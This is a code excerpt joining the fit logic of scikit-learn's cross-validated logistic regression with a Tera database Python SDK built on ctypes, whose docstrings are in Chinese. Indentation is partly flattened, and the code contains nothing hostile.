def __init__(self, Cs=10, fit_intercept=True, cv=None, dual=False,
penalty='l2', scoring=None, solver='lbfgs', tol=1e-4,
max_iter=100, class_weight=None, n_jobs=1, verbose=False,
refit=True, intercept_scaling=1.):
self.Cs = Cs
self.fit_intercept = fit_intercept
self.cv = cv
self.dual = dual
self.penalty = penalty
self.scoring = scoring
self.tol = tol
self.max_iter = max_iter
self.class_weight = class_weight
self.n_jobs = n_jobs
self.verbose = verbose
self.solver = solver
self.refit = refit
        self.intercept_scaling = intercept_scaling
def fit(self, X, y):
"""Fit the model according to the given training data.
Parameters
----------
X : {array-like, sparse matrix}, shape (n_samples, n_features)
            Training vector, where n_samples is the number of samples and
n_features is the number of features.
y : array-like, shape (n_samples,)
Target vector relative to X.
Returns
-------
self : object
Returns self.
"""
if self.solver != 'liblinear':
if self.penalty != 'l2':
raise ValueError("newton-cg and lbfgs solvers support only "
"l2 penalties.")
if self.dual:
raise ValueError("newton-cg and lbfgs solvers support only "
"the primal form.")
X = check_array(X, accept_sparse='csc', dtype=np.float64)
y = check_array(y, ensure_2d=False)
if y.ndim == 2 and y.shape[1] == 1:
warnings.warn(
"A column-vector y was passed when a 1d array was"
" expected. Please change the shape of y to "
"(n_samples, ), for example using ravel().",
DataConversionWarning
)
y = np.ravel(y)
check_consistent_length(X, y)
# init cross-validation generator
cv = _check_cv(self.cv, X, y, classifier=True)
folds = list(cv)
self._enc = LabelEncoder()
self._enc.fit(y)
labels = self.classes_
n_classes = len(labels)
if n_classes < 2:
raise ValueError("Number of classes have to be greater than one.")
if n_classes == 2:
# OvA in case of binary problems is as good as fitting
# the higher label
n_classes = 1
labels = labels[1:]
        if self.class_weight and not (isinstance(self.class_weight, dict) or
                                      self.class_weight == 'auto'):
raise ValueError("class_weight provided should be a "
"dict or 'auto'")
path_func = delayed(_log_reg_scoring_path)
fold_coefs_ = Parallel(n_jobs=self.n_jobs, verbose=self.verbose)(
path_func(X, y, train, test, pos_class=label, Cs=self.Cs,
fit_intercept=self.fit_intercept, penalty=self.penalty,
dual=self.dual, solver=self.solver,
max_iter=self.max_iter, tol=self.tol,
class_weight=self.class_weight,
verbose=max(0, self.verbose - 1),
scoring=self.scoring,
intercept_scaling=self.intercept_scaling)
for label in labels
for train, test in folds)
coefs_paths, Cs, scores = zip(*fold_coefs_)
self.Cs_ = Cs[0]
coefs_paths = np.reshape(coefs_paths, (n_classes, len(folds),
len(self.Cs_), -1))
self.coefs_paths_ = dict(zip(labels, coefs_paths))
scores = np.reshape(scores, (n_classes, len(folds), -1))
self.scores_ = dict(zip(labels, scores))
self.C_ = list()
self.coef_ = list()
self.intercept_ = list()
for label in labels:
scores = self.scores_[label]
coefs_paths = self.coefs_paths_[label]
if self.refit:
best_index = scores.sum(axis=0).argmax()
C_ = self.Cs_[best_index]
self.C_.append(C_)
coef_init = np.mean(coefs_paths[:, best_index, :], axis=0)
w, _ = logistic_regression_path(
X, y, pos_class=label, Cs=[C_], solver=self.solver,
fit_intercept=self.fit_intercept, coef=coef_init,
max_iter=self.max_iter, tol=self.tol,
class_weight=self.class_weight,
verbose=max(0, self.verbose - 1))
w = w[0]
else:
# Take the best scores across every fold and the average of all
# coefficients corresponding to the best scores.
best_indices = np.argmax(scores, axis=1)
w = np.mean([
coefs_paths[i][best_indices[i]]
for i in range(len(folds))
], axis=0)
self.C_.append(np.mean(self.Cs_[best_indices]))
if self.fit_intercept:
self.coef_.append(w[:-1])
self.intercept_.append(w[-1])
else:
self.coef_.append(w)
self.intercept_.append(0.)
self.C_ = np.asarray(self.C_)
self.coef_ = np.asarray(self.coef_)
self.intercept_ = np.asarray(self.intercept_)
return self
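# Illustrative sketch (hypothetical toy data): cross-validated selection of
# C. After fit(), Cs_ holds the evaluated grid, scores_ the per-fold scores,
# and C_ the chosen value(s), one per one-vs-all problem.
def _demo_logistic_regression_cv():
    rng = np.random.RandomState(0)
    X = rng.randn(80, 4)
    y = (X[:, 0] + X[:, 1] > 0).astype(np.int32)
    clf = LogisticRegressionCV(Cs=4, cv=3, solver='lbfgs').fit(X, y)
    assert clf.Cs_.shape == (4,)
    assert clf.C_.shape == (1,)  # binary problem: a single OvA fit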
| soulmachine/scikit-learn | sklearn/linear_model/logistic.py | Python | bsd-3-clause | 38,054 |
# -*- coding: utf-8 -*-
"""
Tera Python SDK. It needs a libtera_c.so
TODO(taocipian) __init__.py
"""
from ctypes import CFUNCTYPE, POINTER
from ctypes import byref, cdll, string_at
from ctypes import c_bool, c_char_p, c_void_p
from ctypes import c_uint32, c_int32, c_int64, c_ubyte, c_uint64
class Status(object):
""" status code """
# C++ tera.h ErrorCode
OK = 0
NotFound = 1
BadParam = 2
System = 3
Timeout = 4
Busy = 5
NoQuota = 6
NoAuth = 7
Unknown = 8
NotImpl = 9
reason_list_ = ["ok", "not found", "bad parameter",
"unknown error", "request timeout", "busy",
"no quota", "operation not permitted", "unknown error",
"not implemented"]
def __init__(self, c):
""" init """
self.c_ = c
if c < 0 or c > len(Status.reason_list_) - 1:
self.reason_ = "bad status code"
else:
self.reason_ = Status.reason_list_[c]
def GetReasonString(self):
"""
Returns:
(string) status string
"""
return Status.reason_list_[self.c_]
def GetReasonNumber(self):
"""
Returns:
(long) status code
"""
return self.c_
class ScanDescriptor(object):
""" scan操作描述符
scan出[start_key, end_key)范围内的所有数据,每个cell默认返回最新的1个版本
"""
def __init__(self, start_key):
"""
Args:
            start_key(string): start position of the scan; the result
                includes start_key
"""
self.desc = lib.tera_scan_descriptor(start_key,
c_uint64(len(start_key)))
def Destroy(self):
"""
        Destroys this scan_descriptor and releases the underlying
        resources; do not use this object afterwards.
"""
lib.tera_scan_descriptor_destroy(self.desc)
def SetEnd(self, end_key):
"""
        If this method is not called, end_key is set to "infinity".
        Args:
            end_key(string): end position of the scan; the result
                excludes end_key
"""
lib.tera_scan_descriptor_set_end(self.desc, end_key,
c_uint64(len(end_key)))
def SetMaxVersions(self, versions):
"""
        If this method is not called, only the latest version of each
        cell is scanned by default.
        Args:
            versions(long): maximum number of versions returned per
                cell during the scan
"""
lib.tera_scan_descriptor_set_max_versions(self.desc, versions)
def SetBufferSize(self, buffer_size):
"""
        The server accumulates scanned data into a buffer and returns a
        batch once the buffer reaches buffer_size; it may also return
        before the buffer is full, on timeout or when the scan reaches
        its end. The default is 64 * 1024.
        This option has a very noticeable impact on scan performance:
        our tests show that 1024*1024 (1MB) performs well in many
        scenarios; tune it for your own workload.
        Args:
            buffer_size: size of the scan buffer, in bytes
"""
lib.tera_scan_descriptor_set_buffer_size(self.desc, buffer_size)
def SetPackInterval(self, interval):
"""
        Sets the timeout of the scan, in ms.
        The server returns results to the client as soon as possible
        once the scan has run for roughly interval milliseconds.
        Args:
            interval(long): timeout of one scan, in ms
"""
lib.tera_scan_descriptor_set_pack_interval(self.desc, interval)
def AddColumn(self, cf, qu):
"""
        Selects one Column (ColumnFamily + Qualifier) for the scan;
        other columns are filtered out and not returned to the client.
        Args:
            cf(string): ColumnFamily name to select
            qu(string): Qualifier name to select
"""
lib.tera_scan_descriptor_add_column(self.desc, cf,
qu, c_uint64(len(qu)))
def AddColumnFamily(self, cf):
"""
        Same as AddColumn, but selects a whole ColumnFamily.
        Args:
            cf(string): ColumnFamily name to select
"""
lib.tera_scan_descriptor_add_column_family(self.desc, cf)
def SetTimeRange(self, start, end):
"""
        Sets the time range of the returned versions.
        Note for C++ API users: in the C++ interface the order of the
        start and end parameters is the reverse of this one!
        Args:
            start(long): start timestamp (inclusive),
                Epoch (00:00:00 UTC, January 1, 1970), measured in us
            end(long): end timestamp (inclusive),
Epoch (00:00:00 UTC, January 1, 1970), measured in us
"""
lib.tera_scan_descriptor_set_time_range(self.desc, start, end)
class ResultStream(object):
""" scan操作返回的输出流
"""
def __init__(self, stream):
""" init """
self.stream = stream
def Destroy(self):
"""
        Destroys this result_stream and releases the underlying
        resources; do not use this object afterwards.
"""
lib.tera_result_stream_destroy(self.stream)
def Done(self):
""" 此stream是否已经读完
Returns:
(bool) 如果已经读完,则返回 true, 否则返回 false.
"""
err = c_char_p()
return lib.tera_result_stream_done(self.stream, byref(err))
def Next(self):
""" 迭代到下一个cell
"""
lib.tera_result_stream_next(self.stream)
def RowName(self):
"""
Returns:
            (string) rowkey of the current cell
"""
value = POINTER(c_ubyte)()
vallen = c_uint64()
lib.tera_result_stream_row_name(self.stream,
byref(value), byref(vallen))
return copy_string_to_user(value, long(vallen.value))
def Family(self):
"""
Returns:
            (string) ColumnFamily of the current cell
"""
value = POINTER(c_ubyte)()
vallen = c_uint64()
lib.tera_result_stream_family(self.stream, byref(value), byref(vallen))
return copy_string_to_user(value, long(vallen.value))
def Qualifier(self):
"""
Returns:
            (string) Qualifier of the current cell
"""
value = POINTER(c_ubyte)()
vallen = c_uint64()
lib.tera_result_stream_qualifier(self.stream,
byref(value), byref(vallen))
return copy_string_to_user(value, long(vallen.value))
def ColumnName(self):
"""
Returns:
            (string) column name of the current cell
                (i.e. ColumnFamily:Qualifier)
"""
value = POINTER(c_ubyte)()
vallen = c_uint64()
lib.tera_result_stream_column_name(self.stream,
byref(value), byref(vallen))
return copy_string_to_user(value, long(vallen.value))
def Value(self):
"""
Returns:
            (string) value of the current cell
"""
value = POINTER(c_ubyte)()
vallen = c_uint64()
lib.tera_result_stream_value(self.stream, byref(value), byref(vallen))
return copy_string_to_user(value, long(vallen.value))
def ValueInt64(self):
"""
Returns:
            (long) value of the current cell read as an int64 counter.
            Calling this on a cell that is not an int64 counter is
            undefined behavior.
"""
return lib.tera_result_stream_value_int64(self.stream)
def Timestamp(self):
"""
Returns:
            (long) timestamp of the current cell,
Epoch (00:00:00 UTC, January 1, 1970), measured in us
"""
return lib.tera_result_stream_timestamp(self.stream)
class Client(object):
""" 通过Client对象访问一个tera集群
使用建议:一个集群对应一个Client即可,如需访问多个Client,需要创建多个
"""
def __init__(self, conf_path, log_prefix):
"""
Raises:
            TeraSdkException: failed to create the Client object
"""
err = c_char_p()
self.client = lib.tera_client_open(conf_path, log_prefix, byref(err))
if self.client is None:
raise TeraSdkException("open client failed:" + str(err.value))
def Close(self):
"""
        Destroys this client and releases the underlying resources; do
        not use this object afterwards.
"""
lib.tera_client_close(self.client)
def OpenTable(self, name):
""" 打开名为<name>的表
Args:
name(string): 表名
Returns:
(Table) 打开的Table指针
Raises:
TeraSdkException: 打开table时出错
"""
err = c_char_p()
table_ptr = lib.tera_table_open(self.client, name, byref(err))
if table_ptr is None:
raise TeraSdkException("open table failed:" + err.value)
return Table(table_ptr)
MUTATION_CALLBACK = CFUNCTYPE(None, c_void_p)
class RowMutation(object):
""" 对某一行的变更
在Table.ApplyMutation()调用之前,
RowMutation的所有操作(如Put/DeleteColumn)都不会立即生效
"""
def __init__(self, mutation):
""" init """
self.mutation = mutation
def PutKV(self, value, ttl):
""" 写入(修改)值为<value>
Args:
value(string): cell的值
ttl: value 过期时间
"""
lib.tera_row_mutation_put_kv(self.mutation, value,
c_uint64(len(value)), c_int32(ttl))
def Put(self, cf, qu, value):
""" 写入(修改)这一行上
ColumnFamily为<cf>, Qualifier为<qu>的cell值为<value>
Args:
cf(string): ColumnFamily名
qu(string): Qualifier名
value(string): cell的值
"""
lib.tera_row_mutation_put(self.mutation, cf,
qu, c_uint64(len(qu)),
value, c_uint64(len(value)))
def PutWithTimestamp(self, cf, qu, timestamp, value):
""" 写入(修改)这一行上
ColumnFamily为<cf>, Qualifier为<qu>的cell值为<value>
指定版本(时间戳)为timestamp
Args:
cf(string): ColumnFamily名
qu(string): Qualifier名
timestamp(long): 版本号/时间戳
value(string): cell的值
"""
lib.tera_row_mutation_put_with_timestamp(self.mutation, cf,
qu, c_uint64(len(qu)),
timestamp,
value, c_uint64(len(value)))
def DeleteColumnAllVersions(self, cf, qu):
""" 删除这一行上
ColumnFamily为<cf>, Qualifier为<qu>的cell的所有版本
如果没有用到多版本机制或本列只存储了一个版本(默认情况),
那么使用`DeleteColumnAllVersions`而不是`DeleteColumnWithVersion`来删除本列会更方便,
因为不用指定timestamp作为版本号。
Args:
cf(string): ColumnFamily名
qu(string): Qualifier名
"""
lib.tera_row_mutation_delete_column_all_versions(self.mutation, cf,
qu, c_uint64(len(qu)))
def DeleteColumnWithVersion(self, cf, qu, ts):
""" 删除这一行上
ColumnFamily为<cf>, Qualifier为<qu>的cell中Timestamp为<ts>的那个版本
Args:
cf(string): ColumnFamily名
qu(string): Qualifier名
ts(long): Timestamp(版本号)
"""
lib.tera_row_mutation_delete_column_with_version(self.mutation, cf,
qu, c_uint64(len(qu)),
ts)
def DeleteFamily(self, cf):
""" 删除ColumnFamily下所有列的所有版本
Args:
cf(string): ColumnFamily名
"""
lib.tera_row_mutation_delete_family(self.mutation, cf)
def DeleteRow(self):
""" 删除整行
"""
lib.tera_row_mutation_delete_row(self.mutation)
def RowKey(self):
"""
Returns:
            (string): rowkey of this RowMutation object; useful, for
                example, inside a callback
"""
value = POINTER(c_ubyte)()
vallen = c_uint64()
lib.tera_row_mutation_rowkey(self.mutation,
byref(value), byref(vallen))
return copy_string_to_user(value, long(vallen.value))
def SetCallback(self, callback):
""" 设置回调
调用此函数则本次变更为异步(Table.ApplyMutation()立即返回);
否则本次变更为同步(Table.ApplyMutation()等待写入操作完成后返回)。
Args:
callback(MUTATION_CALLBACK): 用户回调,不论任何情况,最终都会被调用
"""
lib.tera_row_mutation_set_callback(self.mutation, callback)
def GetStatus(self):
"""
        Returns the result status of this mutation
        Returns:
            (class Status) operation status; tells success or failure,
                and on failure the specific reason
"""
return Status(lib.tera_row_mutation_get_status_code(self.mutation))
def Destroy(self):
"""
        Destroys this mutation and releases the underlying resources;
        do not use this object afterwards.
"""
lib.tera_row_mutation_destroy(self.mutation)
# Deprecated
def DeleteColumn(self, cf, qu):
""" 删除这一行上
ColumnFamily为<cf>, Qualifier为<qu>的cell
Args:
cf(string): ColumnFamily名
qu(string): Qualifier名
"""
lib.tera_row_mutation_delete_column(self.mutation, cf,
qu, c_uint64(len(qu)))
# Deprecated
def PutInt64(self, cf, qu, value):
""" 写入(修改)这一行上
ColumnFamily为<cf>, Qualifier为<qu>的cell值为<value>
Args:
cf(string): ColumnFamily名
qu(string): Qualifier名
value(long): cell的值
"""
lib.tera_row_mutation_put_int64(self.mutation, cf,
qu, c_uint64(len(qu)), value)
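# Illustrative sketch (hypothetical table and key names): an asynchronous
# write driven by a callback. ctypes does not keep the callback alive, so
# the caller must hold a reference to it while the mutation is in flight.
def _demo_async_mutation(table):
    def on_finished(raw_mutation):
        # Wrap the raw pointer so the result can be inspected.
        mu = RowMutation(raw_mutation)
        print("%s: %s" % (mu.RowKey(), mu.GetStatus().GetReasonString()))
        mu.Destroy()
    callback = MUTATION_CALLBACK(on_finished)
    mutation = table.NewRowMutation("row1")
    mutation.Put("cf0", "qu0", "value1")
    mutation.SetCallback(callback)  # makes ApplyMutation asynchronous
    table.ApplyMutation(mutation)   # returns immediately
    return callback                 # keep it referenced until completion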
class Table(object):
""" 对表格的所有增删查改操作由此发起
通过Client.OpenTable()获取一个Table对象
"""
def __init__(self, table):
""" init """
self.table = table
def Close(self):
"""
        Destroys this table and releases the underlying resources; do
        not use this object afterwards.
"""
lib.tera_table_close(self.table)
def NewRowMutation(self, rowkey):
""" 生成一个对 rowkey 的RowMutation对象(修改一行)
一个RowMutation对某一行的操作(例如多列修改)是原子的
Args:
rowkey(string): 待变更的rowkey
Returns:
(class RowMutation): RowMutation对象
"""
return RowMutation(lib.tera_row_mutation(self.table, rowkey,
c_uint64(len(rowkey))))
def ApplyMutation(self, mutation):
""" 应用一次变更,
如果之前调用过 SetCallback() 则本次调用为异步,否则为同步
Args:
mutation(class RowMutation): RowMutation对象
"""
lib.tera_table_apply_mutation(self.table, mutation.mutation)
def NewRowReader(self, rowkey):
""" 生成一个对 rowkey 的RowReader对象(读取一行)
一个RowReader对某一行的操作(例如读取多列)是原子的
Args:
rowkey(string): 待读取的rowkey
Returns:
(class RowReader): RowReader对象
"""
return RowReader(lib.tera_row_reader(self.table, rowkey,
c_uint64(len(rowkey))))
def ApplyReader(self, reader):
""" 应用一次读取,
如果之前调用过 SetCallback() 则本次调用为异步,否则为同步
Args:
reader(class RowReader): RowReader对象
"""
lib.tera_table_apply_reader(self.table, reader.reader)
def IsPutFinished(self):
""" table的异步写操作是否*全部*完成
Returns:
(bool) 全部完成则返回true,否则返回false.
"""
return lib.tera_table_is_put_finished(self.table)
def IsGetFinished(self):
""" table的异步读操作是否*全部*完成
Returns:
(bool) 全部完成则返回true,否则返回false.
"""
return lib.tera_table_is_get_finished(self.table)
def BatchGet(self, row_reader_list):
""" 批量get
用法类似 ApplyReader
Args:
row_reader_list(RowReader): 预先构造好的RowReader列表
每一行的读取结果存储在row_reader_list里对应的每个RowReader内,
如果该行读取成功(即返回的状态码是OK),
那么可以调用诸如RowReader.Value()访问读取结果
否则读取出错,通过状态码确定原因。
用法详见sample.py
"""
num = len(row_reader_list)
r = list()
for i in row_reader_list:
r.append(i.reader)
reader_array = (c_void_p * num)(*r)
lib.tera_table_apply_reader_batch(self.table, reader_array, num)
def Get(self, rowkey, cf, qu, snapshot=0):
""" 同步get一个cell的值
Args:
rowkey(string): Rowkey的值
cf(string): ColumnFamily名
qu(string): Qualifier名
snapshot(long): 快照,不关心的用户设置为0即可
Returns:
(string) cell的值
Raises:
TeraSdkException: 读操作失败
"""
err = c_char_p()
value = POINTER(c_ubyte)()
vallen = c_uint64()
result = lib.tera_table_get(
self.table, rowkey, c_uint64(len(rowkey)), cf,
qu, c_uint64(len(qu)), byref(value), byref(vallen), byref(err),
c_uint64(snapshot)
)
if not result:
raise TeraSdkException("get record failed:" + err.value)
return copy_string_to_user(value, long(vallen.value))
def GetInt64(self, rowkey, cf, qu, snapshot):
""" 类同Get()接口,区别是将cell的内容作为int64计数器返回
对非int64计数器的cell调用此方法属于未定义行为
Args:
rowkey(string): Rowkey的值
cf(string): ColumnFamily名
qu(string): Qualifier名
snapshot(long): 快照,不关心的用户设置为0即可
Returns:
(long) cell的数值
Raises:
TeraSdkException: 读操作失败
"""
err = c_char_p()
value = c_int64()
result = lib.tera_table_getint64(
self.table, rowkey, c_uint64(len(rowkey)), cf,
qu, c_uint64(len(qu)), byref(value), byref(err),
c_uint64(snapshot)
)
if not result:
raise TeraSdkException("get record failed:" + err.value)
return long(value.value)
def Put(self, rowkey, cf, qu, value):
""" 同步put一个cell的值
Args:
rowkey(string): Rowkey的值
cf(string): ColumnFamily名
qu(string): Qualifier名
value(string): cell的值
Raises:
TeraSdkException: 写操作失败
"""
err = c_char_p()
result = lib.tera_table_put(
self.table, rowkey, c_uint64(len(rowkey)), cf,
qu, c_uint64(len(qu)), value, c_uint64(len(value)), byref(err)
)
if not result:
raise TeraSdkException("put record failed:" + err.value)
def BatchPut(self, row_mutation_list):
""" 批量put
用法类似 ApplyMutation
Args:
row_mutation_list(RowMutation): 预先构造好的RowMutation列表
每一行的写入操作返回状态存储在row_mutation_list里对应的每个RowMutation内,
如果写入失败,通过状态码确定原因。
用法详见sample.py
"""
num = len(row_mutation_list)
r = list()
for i in row_mutation_list:
r.append(i.mutation)
mutation_array = (c_void_p * num)(*r)
lib.tera_table_apply_mutation_batch(self.table, mutation_array, num)
def PutInt64(self, rowkey, cf, qu, value):
""" 类同Put()方法,区别是这里的参数value可以是一个数字(能够用int64表示)计数器
Args:
rowkey(string): Rowkey的值
cf(string): ColumnFamily名
qu(string): Qualifier名
value(long): cell的数值,能够用int64表示
Raises:
TeraSdkException: 写操作失败
"""
err = c_char_p()
result = lib.tera_table_putint64(
self.table, rowkey, c_uint64(len(rowkey)), cf,
qu, c_uint64(len(qu)), value, byref(err)
)
if not result:
raise TeraSdkException("put record failed:" + err.value)
def Delete(self, rowkey, cf, qu):
""" 同步删除某个cell
Args:
rowkey(string): Rowkey的值
cf(string): ColumnFamily名
qu(string): Qualifier名
"""
lib.tera_table_delete(
self.table, rowkey, c_uint64(len(rowkey)),
cf, qu, c_uint64(len(qu))
)
def Scan(self, desc):
""" 发起一次scan操作
Args:
desc(ScanDescriptor): scan操作描述符
Raises:
TeraSdkException: scan失败
"""
err = c_char_p()
stream = lib.tera_table_scan(
self.table,
desc.desc,
byref(err)
)
if stream is None:
raise TeraSdkException("scan failed:" + err.value)
return ResultStream(stream)
READER_CALLBACK = CFUNCTYPE(None, c_void_p)
class RowReader(object):
""" 提供随机读取一行的功能
"""
def __init__(self, reader):
""" init """
self.reader = reader
def AddColumnFamily(self, cf):
""" 添加期望读取的ColumnFamily
默认读取一行(row)的全部ColumnFamily
Args:
cf(string): 期望读取的ColumnFamily
"""
lib.tera_row_reader_add_column_family(self.reader, cf)
def AddColumn(self, cf, qu):
""" 添加期望读取的Column
默认读取一行(row)的全部Column(ColumnFamily + Qualifier)
Args:
cf(string): 期望读取的ColumnFamily
qu(string): 期望读取的Qualifier
"""
lib.tera_row_reader_add_column(self.reader, cf, qu, c_uint64(len(qu)))
def SetCallback(self, callback):
""" 设置回调
调用此函数则本次随机读为异步(Table.ApplyReader()立即返回);
否则本次随机读为同步(Table.ApplyReader()等待读取操作完成后返回)
可以在回调中执行 Done() 和 Next() 对返回的结果进行迭代处理
Args:
callback(READER_CALLBACK): 用户回调,不论任何情况,最终都会被调用
"""
lib.tera_row_reader_set_callback(self.reader, callback)
def SetTimestamp(self, ts):
""" set timestamp """
lib.tera_row_reader_set_timestamp(self.reader, ts)
def SetTimeRange(self, start, end):
""" set time range """
lib.tera_row_reader_set_time_range(self.reader, start, end)
def SetSnapshot(self, snapshot):
""" set snapshot """
lib.tera_row_reader_set_snapshot(self.reader, snapshot)
def SetMaxVersions(self, versions):
""" set max versions """
lib.tera_row_reader_set_max_versions(self.reader, versions)
def SetTimeout(self, timeout):
""" set timeout """
lib.tera_row_reader_set_timeout(self.reader, timeout)
def Done(self):
""" 结果是否已经读完
Returns:
(bool) 如果已经读完,则返回 true, 否则返回 false.
"""
return lib.tera_row_reader_done(self.reader)
def Next(self):
""" 迭代到下一个cell
"""
lib.tera_row_reader_next(self.reader)
def RowKey(self):
"""
Returns:
            (string) rowkey of the current cell
"""
value = POINTER(c_ubyte)()
vallen = c_uint64()
lib.tera_row_reader_rowkey(self.reader,
byref(value), byref(vallen))
return copy_string_to_user(value, long(vallen.value))
def Value(self):
"""
Returns:
            (string) value of the current cell
"""
value = POINTER(c_ubyte)()
vallen = c_uint64()
lib.tera_row_reader_value(self.reader, byref(value), byref(vallen))
return copy_string_to_user(value, long(vallen.value))
def ValueInt64(self):
"""
Returns:
            (long) value of the current cell
"""
return long(lib.tera_row_reader_value_int64(self.reader))
def Family(self):
"""
Returns:
            (string) ColumnFamily of the current cell
"""
value = POINTER(c_ubyte)()
vallen = c_uint64()
lib.tera_row_reader_family(self.reader, byref(value), byref(vallen))
return copy_string_to_user(value, long(vallen.value))
def Qualifier(self):
"""
Returns:
            (string) Qualifier of the current cell
"""
value = POINTER(c_ubyte)()
vallen = c_uint64()
lib.tera_row_reader_qualifier(self.reader, byref(value), byref(vallen))
return copy_string_to_user(value, long(vallen.value))
def Timestamp(self):
"""
Returns:
            (long) timestamp of the current cell, Unix time
"""
return lib.tera_row_reader_timestamp(self.reader)
def GetStatus(self):
"""
        Returns the result status of this RowReader's read
        Returns:
            (class Status) operation status; tells success or failure,
                and on failure the specific reason
"""
return Status(lib.tera_row_reader_get_status_code(self.reader))
def Destroy(self):
"""
        Destroys this reader and releases the underlying resources; do
        not use this object afterwards.
"""
lib.tera_row_reader_destroy(self.reader)
class TeraSdkException(Exception):
""" exception """
def __init__(self, reason):
""" init """
self.reason = reason
def __str__(self):
""" str """
return self.reason
####################################################
# Users do not need to care about the code below.  #
####################################################
def init_function_prototype_for_scan():
""" scan """
######################
# scan result stream #
######################
lib.tera_result_stream_done.argtypes = [c_void_p,
POINTER(c_char_p)]
lib.tera_result_stream_done.restype = c_bool
lib.tera_result_stream_destroy.argtypes = [c_void_p]
lib.tera_result_stream_destroy.restype = None
lib.tera_result_stream_timestamp.argtypes = [c_void_p]
lib.tera_result_stream_timestamp.restype = c_int64
lib.tera_result_stream_column_name.argtypes = [c_void_p,
POINTER(POINTER(c_ubyte)),
POINTER(c_uint64)]
lib.tera_result_stream_column_name.restype = None
lib.tera_result_stream_family.argtypes = [c_void_p,
POINTER(POINTER(c_ubyte)),
POINTER(c_uint64)]
lib.tera_result_stream_family.restype = None
lib.tera_result_stream_next.argtypes = [c_void_p]
lib.tera_result_stream_next.restype = None
lib.tera_result_stream_qualifier.argtypes = [c_void_p,
POINTER(POINTER(c_ubyte)),
POINTER(c_uint64)]
lib.tera_result_stream_qualifier.restype = None
lib.tera_result_stream_row_name.argtypes = [c_void_p,
POINTER(POINTER(c_ubyte)),
POINTER(c_uint64)]
lib.tera_result_stream_row_name.restype = None
lib.tera_result_stream_value.argtypes = [c_void_p,
POINTER(POINTER(c_ubyte)),
POINTER(c_uint64)]
lib.tera_result_stream_value.restype = None
lib.tera_result_stream_value_int64.argtypes = [c_void_p]
lib.tera_result_stream_value_int64.restype = c_int64
###################
# scan descriptor #
###################
lib.tera_scan_descriptor.argtypes = [c_char_p, c_uint64]
lib.tera_scan_descriptor.restype = c_void_p
lib.tera_scan_descriptor_destroy.argtypes = [c_void_p]
lib.tera_scan_descriptor_destroy.restype = None
lib.tera_scan_descriptor_add_column.argtypes = [c_void_p, c_char_p,
c_char_p, c_uint64]
lib.tera_scan_descriptor_add_column.restype = None
lib.tera_scan_descriptor_add_column_family.argtypes = [c_void_p, c_char_p]
lib.tera_scan_descriptor_add_column_family.restype = None
lib.tera_scan_descriptor_set_buffer_size.argtypes = [c_void_p, c_int64]
lib.tera_scan_descriptor_set_buffer_size.restype = None
lib.tera_scan_descriptor_set_end.argtypes = [c_void_p, c_char_p, c_uint64]
lib.tera_scan_descriptor_set_end.restype = None
    lib.tera_scan_descriptor_set_pack_interval.argtypes = [c_void_p, c_int64]
lib.tera_scan_descriptor_set_pack_interval.restype = None
lib.tera_scan_descriptor_set_max_versions.argtypes = [c_void_p, c_int32]
lib.tera_scan_descriptor_set_max_versions.restype = None
lib.tera_scan_descriptor_set_snapshot.argtypes = [c_void_p, c_uint64]
lib.tera_scan_descriptor_set_snapshot.restype = None
lib.tera_scan_descriptor_set_time_range.argtypes = [c_void_p,
c_int64, c_int64]
lib.tera_scan_descriptor_set_time_range.restype = None
def init_function_prototype_for_client():
""" client """
lib.tera_client_open.argtypes = [c_char_p, c_char_p, POINTER(c_char_p)]
lib.tera_client_open.restype = c_void_p
lib.tera_client_close.argtypes = [c_void_p]
lib.tera_client_close.restype = None
lib.tera_table_open.argtypes = [c_void_p, c_char_p, POINTER(c_char_p)]
lib.tera_table_open.restype = c_void_p
lib.tera_table_close.argtypes = [c_void_p]
lib.tera_table_close.restype = None
def init_function_prototype_for_table():
""" table """
lib.tera_table_get.argtypes = [c_void_p, c_char_p, c_uint64,
c_char_p, c_char_p, c_uint64,
POINTER(POINTER(c_ubyte)),
POINTER(c_uint64),
POINTER(c_char_p), c_uint64]
lib.tera_table_get.restype = c_bool
lib.tera_table_getint64.argtypes = [c_void_p, c_char_p, c_uint64,
c_char_p, c_char_p, c_uint64,
POINTER(c_int64), POINTER(c_char_p),
c_uint64]
lib.tera_table_getint64.restype = c_bool
lib.tera_table_put.argtypes = [c_void_p, c_char_p, c_uint64, c_char_p,
c_char_p, c_uint64, c_char_p, c_uint64,
POINTER(c_char_p)]
lib.tera_table_put.restype = c_bool
lib.tera_table_put_kv.argtypes = [c_void_p, c_char_p, c_uint64,
c_char_p, c_uint64, c_int32,
POINTER(c_char_p)]
lib.tera_table_put_kv.restype = c_bool
lib.tera_table_putint64.argtypes = [c_void_p, c_char_p, c_uint64, c_char_p,
c_char_p, c_uint64, c_int64,
POINTER(c_char_p)]
lib.tera_table_putint64.restype = c_bool
lib.tera_table_scan.argtypes = [c_void_p, c_void_p, POINTER(c_char_p)]
lib.tera_table_scan.restype = c_void_p
lib.tera_table_delete.argtypes = [c_void_p, c_char_p, c_uint64,
c_char_p, c_char_p, c_uint64]
lib.tera_table_delete.restype = c_bool
lib.tera_table_apply_mutation.argtypes = [c_void_p, c_void_p]
lib.tera_table_apply_mutation.restype = None
lib.tera_table_apply_mutation_batch.argtypes = [c_void_p,
c_void_p,
c_int64]
lib.tera_table_apply_mutation_batch.restype = None
lib.tera_table_is_put_finished.argtypes = [c_void_p]
lib.tera_table_is_put_finished.restype = c_bool
lib.tera_table_apply_reader.argtypes = [c_void_p, c_void_p]
lib.tera_table_apply_reader.restype = None
lib.tera_table_apply_reader_batch.argtypes = [c_void_p, c_void_p, c_int64]
lib.tera_table_apply_reader_batch.restype = None
lib.tera_table_is_get_finished.argtypes = [c_void_p]
lib.tera_table_is_get_finished.restype = c_bool
lib.tera_row_mutation.argtypes = [c_void_p, c_char_p, c_uint64]
lib.tera_row_mutation.restype = c_void_p
lib.tera_row_mutation_get_status_code.argtypes = [c_void_p]
lib.tera_row_mutation_get_status_code.restype = c_int64
lib.tera_row_mutation_destroy.argtypes = [c_void_p]
lib.tera_row_mutation_destroy.restype = None
def init_function_prototype_for_row_mutation():
""" row_mutation"""
lib.tera_row_mutation_put_kv.argtypes = [c_void_p, c_char_p,
c_uint64, c_int32]
lib.tera_row_mutation_put_kv.restype = None
lib.tera_row_mutation_put.argtypes = [c_void_p, c_char_p,
c_char_p, c_uint64,
c_char_p, c_uint64]
lib.tera_row_mutation_put.restype = None
lib.tera_row_mutation_put_with_timestamp.argtypes = [c_void_p, c_char_p,
c_char_p, c_uint64,
c_int64,
c_void_p, c_uint64]
lib.tera_row_mutation_put_with_timestamp.restype = None
